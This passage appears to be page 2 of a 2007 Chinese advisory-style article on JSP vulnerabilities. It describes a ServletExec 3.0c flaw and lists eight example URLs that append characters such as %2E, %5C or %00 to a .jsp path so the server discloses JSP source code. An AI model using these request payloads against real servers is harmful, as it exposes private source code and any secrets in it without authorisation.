原作者:kuku 添加时间:2007-06-02 原文发表:2007-06-02 人气:18 来源：互联网

---

本文章共3294字，分6页，当前第2页，快速翻页：123456

当一个 HTTP 请求中添加下列字符之一，ServletExec 将返回 JavaScript/" target="_blank">JSP 源代码文件。 . 　　%2E 　　+ 　　%2B 　　\ 　　%5C 　　%20 　　%00 　　成功的利用该漏洞将导致泄露指定的JavaScript/" target="_blank">JSP文件的源代码，例如：使用下面的任意一个URL请求将输出指定的JavaScript/" target="_blank">JSP文件的源代码： 　　1）http://target/directory/jsp/file.jsp. 　　2）http://target/directory/jsp/file.jsp%2E 　　3）http://target/directory/jsp/file.jsp+ 　　4）http://target/directory/jsp/file.jsp%2B 　　5）http://target/directory/jsp/file.jsp\ 　　6）http://target/directory/jsp/file.jsp%5C 　　7）http://target/directory/jsp/file.jsp%20 　　8）http://target/directory/jsp/file.jsp%00 　　受影响的系统： 　　1）Unify eWave ServletExec 3.0c 　　2）Sun Solaris 8.0 　　3）Microsoft Windows 98 　　4）Microsoft Windows NT 4.0   本文章更多内容：<<上一页 - 1 - 2 - 3 - 4 - 5 - 6 - 下一页>> 本页地址

---

• Jsp如何实现网页的重定向 • JSP的login程序代码 • 也谈JSP与XML的交互 • 利用RamdonAccessFile来实现文件的追加 • 关于JSP中文问题的解决方法 • JSP设计模式 • JSP如何连接DB2数据库 • JSP技巧：发送动态图像 • 在JSP中访问数据库大全 • Jsp结合XML+XSLT将输出转换为Html格式

• JSP漏洞大观<2> • JSP安全性初探<1> • JSP安全性初探<2> • JSP与Java Mail API • JSP与XML的结合<1> • JSP与XML的结合<2> • JSP与XML的结合<3> • 缓冲技术提高JSP程序性能和稳定性<1> • 缓冲技术提高JSP程序性能和稳定性<2> • JSP中图片验证的实现

---

本文章所属分类：首页 → 推荐教程 → JSP编程   JSP编程